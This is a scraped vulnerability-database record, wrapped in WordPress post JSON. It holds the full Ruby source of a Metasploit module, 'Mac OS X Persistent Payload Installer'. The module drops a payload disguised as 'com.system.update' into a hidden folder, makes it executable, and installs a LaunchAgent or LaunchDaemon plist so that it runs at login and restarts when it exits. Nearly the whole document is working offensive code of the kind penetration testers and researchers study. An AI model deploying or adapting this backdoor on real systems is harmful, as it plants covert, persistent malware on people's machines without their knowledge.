{“lastseen”:”2025-10-03T19:07:55″,”description”:”This module provides a persistent boot payload by creating a launch item, which can be a LaunchAgent or a LaunchDaemon. LaunchAgents run…”,”published”:”2025-10-03T18:56:41″,”modified”:”2025-10-03T18:56:41″,”type”:”metasploit”,”title”:”Mac OS X Persistent Payload Installer”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-OSX-PERSISTENCE-LAUNCH_PLIST-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘shellwords’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::Common\\n include Msf::Post::File\\n include Msf::Exploit::EXE\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/osx\/local\/persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Mac OS X Persistent Payload Installer’,\\n ‘Description’ =\\u003e %q{\\n This module provides a persistent boot payload by creating a launch item, which can be\\n a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\\n upon login by a plist entry in ~\/Library\/LaunchAgents. LaunchDaemons run with\\n elevated privilleges, and are launched before user login by a plist entry in the ~\/Library\/LaunchDaemons directory.\\n In either case the plist entry specifies an executable that will be run before or at login.\\n\\n Verified on OSX 11.7.10 (Big Sur)\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [ \\”Marcin ‘Icewall’ Noga \\u003cmarcin[at]icewall.pl\\u003e\\”, ‘joev’ ],\\n ‘Targets’ =\\u003e [\\n [ ‘Mac OS X x64 (Native Payload)’, { ‘Arch’ =\\u003e ARCH_X64, ‘Platform’ =\\u003e [ ‘osx’ ] } ],\\n [ ‘Mac OS X x86 (Native Payload for 10.14 and earlier)’, { ‘Arch’ =\\u003e ARCH_X86, ‘Platform’ =\\u003e [ ‘osx’ ] } ],\\n [ ‘Mac OS X Apple Sillicon’, { ‘Arch’ =\\u003e ARCH_AARCH64, ‘Platform’ =\\u003e [‘osx’] }],\\n [ ‘Python payload’, { ‘Arch’ =\\u003e ARCH_PYTHON, ‘Platform’ =\\u003e [ ‘python’ ] } ],\\n [ ‘Command payload’, { ‘Arch’ =\\u003e ARCH_CMD, ‘Platform’ =\\u003e [ ‘unix’ ] } ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘DisclosureDate’ =\\u003e ‘2012-04-01’,\\n ‘Platform’ =\\u003e [ ‘osx’, ‘python’, ‘unix’ ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/taomm.org\/vol1\/pdfs\/CH%202%20Persistence.pdf’],\\n [‘URL’, ‘https:\/\/developer.apple.com\/library\/archive\/documentation\/MacOSX\/Conceptual\/BPSystemStartup\/Chapters\/CreatingLaunchdJobs.html’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1647_PLIST_FILE_MODIFICATION]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES, SCREEN_EFFECTS] # Pop-up on 13.7.4\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘BACKDOOR_PATH’,\\n [\\n true, ‘Path to hide the backdoor on the target.’,\\n ‘~\/Library\/.\\u003crandom\\u003e\/com.system.update’\\n ]),\\n OptBool.new(‘KEEPALIVE’,\\n [true, ‘Continually restart the payload exe if it crashes\/exits.’, true]),\\n OptBool.new(‘RUN_NOW’,\\n [false, ‘Run the installed payload immediately.’, false]),\\n OptEnum.new(‘LAUNCH_ITEM’, [true, ‘Type of launch item, see description for more info. Default is LaunchAgent’, ‘LaunchAgent’, %w[LaunchAgent LaunchDaemon]])\\n ])\\n deregister_options(‘WritableDir’)\\n end\\n\\n def check\\n folder = File.dirname(backdoor_path).shellescape\\n folder = File.dirname(folder)\\n return CheckCode::Safe(\\”#{folder} not found\\”) unless exists?(folder)\\n return CheckCode::Safe(\\”#{folder} not writable\\”) unless writable?(folder)\\n\\n CheckCode::Appears(\\”#{folder} is writable\\”)\\n end\\n\\n def install_persistence\\n check_for_duplicate_entry\\n\\n if target[‘Arch’] == ARCH_PYTHON\\n payload_bin = \\”#!\/usr\/bin\/env python\\\\n\\” + payload.encoded\\n elsif target[‘Arch’] == ARCH_CMD\\n payload_bin = \\”#!\/usr\/bin\/env bash\\\\n\\” + payload.raw\\n else\\n payload_bin = generate_payload_exe\\n end\\n\\n # Store backdoor on target machine\\n write_backdoor(payload_bin)\\n # Add plist file to LaunchAgents dir\\n add_launchctl_item\\n @clean_up_rc \\u003c\\u003c \\”rm #{plist_path}\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”execute -f \/bin\/launchctl -a \\\\\\”stop #{File.basename(backdoor_path)}\\\\\\”\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”execute -f \/bin\/launchctl -a \\\\\\”remove #{File.basename(backdoor_path)}\\\\\\”\\\\n\\”\\\\\\n end\\n\\n private\\n\\n # drops a LaunchAgent plist into the user’s Library, which specifies to run backdoor_path\\n def add_launchctl_item\\n label = File.basename(backdoor_path)\\n cmd_exec(\\”mkdir -p #{File.dirname(plist_path).shellescape}\\”)\\n # NOTE: the OnDemand key is the OSX \\u003c 10.4 equivalent of KeepAlive\\n item = \\u003c\\u003c-EOF\\n \\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003c!DOCTYPE plist PUBLIC \\”-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\\” \\”http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\\”\\u003e\\n \\u003cplist version=\\”1.0\\”\\u003e\\n \\u003cdict\\u003e\\n \\u003ckey\\u003eLabel\\u003c\/key\\u003e\\n \\u003cstring\\u003e#{label}\\u003c\/string\\u003e\\n \\u003ckey\\u003eProgram\\u003c\/key\\u003e\\n \\u003cstring\\u003e#{backdoor_path}\\u003c\/string\\u003e\\n \\u003ckey\\u003eProgramArguments\\u003c\/key\\u003e\\n \\u003carray\\u003e\\n \\u003cstring\\u003e#{backdoor_path}\\u003c\/string\\u003e\\n \\u003c\/array\\u003e\\n \\u003ckey\\u003eRunAtLoad\\u003c\/key\\u003e\\n \\u003ctrue\/\\u003e\\n \\u003ckey\\u003eOnDemand\\u003c\/key\\u003e\\n \\u003c#{keepalive?}\/\\u003e\\n \\u003ckey\\u003eKeepAlive\\u003c\/key\\u003e\\n \\u003c#{keepalive?}\/\\u003e\\n \\u003c\/dict\\u003e\\n \\u003c\/plist\\u003e\\n EOF\\n\\n if write_file(plist_path, item)\\n print_good(\\”LaunchAgent added: #{plist_path}\\”)\\n @clean_up_rc \\u003c\\u003c \\”rm #{plist_path}\\\\n\\”\\n else\\n fail_with(Failure::UnexpectedReply, \\”Error writing LaunchAgent item to #{plist_path}\\”)\\n end\\n\\n if run_now?\\n cmd_exec(\\”launchctl load -w #{plist_path.shellescape}\\”)\\n else\\n print_warning(\\”To manually launch payload: launchctl load -w #{plist_path.shellescape}\\”)\\n end\\n\\n print_good(‘LaunchAgent installed successfully.’)\\n end\\n\\n # path to upload the backdoor. any \\u003cuser\\u003e or \\u003crandom\\u003e substrings will be replaced.\\n # @return [String] path to drop the backdoor payload.\\n def backdoor_path\\n @backdoor_path ||= datastore[‘BACKDOOR_PATH’]\\n .gsub(‘\\u003crandom\\u003e’) { Rex::Text.rand_text_alpha(8) }\\n .gsub(%r{^~\/}, \\”\/Users\/#{user}\/\\”)\\n end\\n\\n # raises an error if a Launch Agent already exists at desired same plist_path\\n def check_for_duplicate_entry\\n if file?(plist_path)\\n fail_with ‘FileError’, \\”Duplicate LaunchAgent plist already exists at #{plist_path}\\”\\n end\\n end\\n\\n # @return [Boolean] user wants the persistence to be restarted constantly if it exits\\n def keepalive?\\n datastore[‘KEEPALIVE’]\\n end\\n\\n # path to the LaunchAgent service configuration plist\\n # @return [String] path to the LaunchAgent service\\n def plist_path\\n @plist_path ||= \\”\/Users\/#{user}\/Library\/#{datastore[‘LAUNCH_ITEM’]}s\/#{File.basename(backdoor_path)}.plist\\”\\n end\\n\\n # @return [Boolean] user wants to launch the LaunchAgent immediately\\n def run_now?\\n datastore[‘RUN_NOW’]\\n end\\n\\n # @return [String] username of the session\\n def user\\n @user ||= cmd_exec(‘whoami’).strip\\n end\\n\\n # drops the file to disk, then makes it executable\\n # @param [String] exe the executable to drop\\n def write_backdoor(exe)\\n print_status(‘Dropping backdoor executable…’)\\n cmd_exec(\\”mkdir -p #{File.dirname(backdoor_path).shellescape}\\”)\\n\\n if write_file(backdoor_path, exe)\\n print_good(\\”Backdoor stored to #{backdoor_path}\\”)\\n cmd_exec(\\”chmod +x #{backdoor_path.shellescape}\\”)\\n @clean_up_rc \\u003c\\u003c \\”rm #{backdoor_path}\\\\n\\”\\n else\\n fail_with(Failure::UnexpectedReply, \\”Error dropping backdoor to #{backdoor_path}\\”)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/osx\/persistence\/launch_plist.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/osx\/persistence\/launch_plist\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-03T19:07:55″,”description”:”This module provides a persistent boot payload by creating a launch item, which can be a LaunchAgent or a LaunchDaemon. LaunchAgents run…”,”published”:”2025-10-03T18:56:41″,”modified”:”2025-10-03T18:56:41″,”type”:”metasploit”,”title”:”Mac OS X Persistent…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-20170","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n